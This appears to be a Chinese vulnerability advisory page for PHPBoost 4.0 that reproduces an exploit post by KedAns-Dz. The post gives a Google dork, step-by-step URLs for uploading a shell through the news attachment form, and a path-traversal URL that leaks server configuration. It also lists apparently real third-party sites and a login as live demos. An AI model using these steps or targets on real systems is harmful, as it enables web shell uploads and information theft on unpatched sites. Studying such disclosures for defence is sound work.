发布日期:2013-03-11
更新日期:2013-03-14受影响系统:
PHPBoost PHPBoost 4.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 58432
PHPBoost是一个内容管理系统。
PHPBoost 4.0及其他版本的/phpboost/news/management.php脚本没有正确验证或过滤用户上传的文件,通过上传.php文件,远程系统可将文件放置在用户可访问的路径中。直接请求已经上传的文件会允许用户以Web服务器权限执行脚本。
<*来源:KedAns-Dz
链接:http://www.osvdb.org/show/osvdb/91209
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /" __ /"__` / \__ /"__` 0
0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1
1 /_/ /" _ ` / /_/_\_<_ /"___ / /`"__ 0
0 / / / / \__/ \_ \_ / 1
1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0
0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1
1 \____/ >> Exploit database separated by exploit 0
0 /___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I"m KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ###
# Title : PHPBoost 4.0 <= (FileUpload/Disclosure) Multiple Vulnerabilities
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com)
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com
# FaCeb0ok : http://fb.me/Inj3ct0rK3d
# TwiTter : @kedans
# Friendly Sites : www.r00tw0rm.com * www.exploit-id.com
# Platform/CatID : php - remote - Multiple
# Type : php - proof of concept - webapp 0day
# Tested on : Windows7
# Download : [http://www.phpboost.com/download/download.php]
# Vendor : [www.phpboost.com]
###
# <3 <3 Greetings t0 Palestine <3 <3
# F-ck HaCking, Lov3 Explo8ting !
######## [ Proof / Exploit ] ################|=>
# Google Dork :
---------------
= allintext:"Boosté par PHPBoost 4.0"
# Start ... Create new User
--------
= http://127.0.0.1/phpboost/user/?url=/registration/
# Remote File Upload :
----------------------
+ Go to see News page =>
= http://127.0.0.1/phpboost/news/news.php
+ Post new news =>
= http://127.0.0.1/phpboost/news/management.php?new=1&cat=0
+ Push Upload attatch , and upload you"r file/Shell ( ex k.txt )
! proof img : (http://oi45.tinypic.com/ay2cs7.jpg)
! Find you"r file ex:
= http://127.0.0.1/phpboost/upload/k.txt
Demo : ***************************************
http://asylumspecimens.olympe.in
user : ked
pass : 123456
http://asylumspecimens.olympe.in/upload/k.txt
***********************************************
# Full Informations Disclosure :
---------------------------------
= http://127.0.0.1/phpboost/user/?url=/../../KedAns
! You Get Error page , in page content you see some php.ini content
like server information , and the full path ...etc
proof img : (http://oi49.tinypic.com/2l00g.jpg)
Demo"s : ************************************************
http://shura-fansub.rd-h.com/user/?url=/../../KedAns
http://asylumspecimens.olympe.in/user/?url=/../../KedAns
**********************************************************
# Sp. GreetS t0 : Elite_Trojan & Evil-Dz & all Dz_Mafia Cr3w <3
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem
# Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ,
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
# Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all
# Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * B.N.T * All Security and Exploits Webs
#============================================================================================================建议:
--------------------------------------------------------------------------------
厂商补丁:
PHPBoost
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.phpboost.com/download/download.phpNVIDIA Graphics Driver for Windows本地权限提升漏洞(CVE-2013-0109)FFmpeg msrle_decode_8_16_24_32函数远程代码执行漏洞相关资讯 PHPBoost 本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保??或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|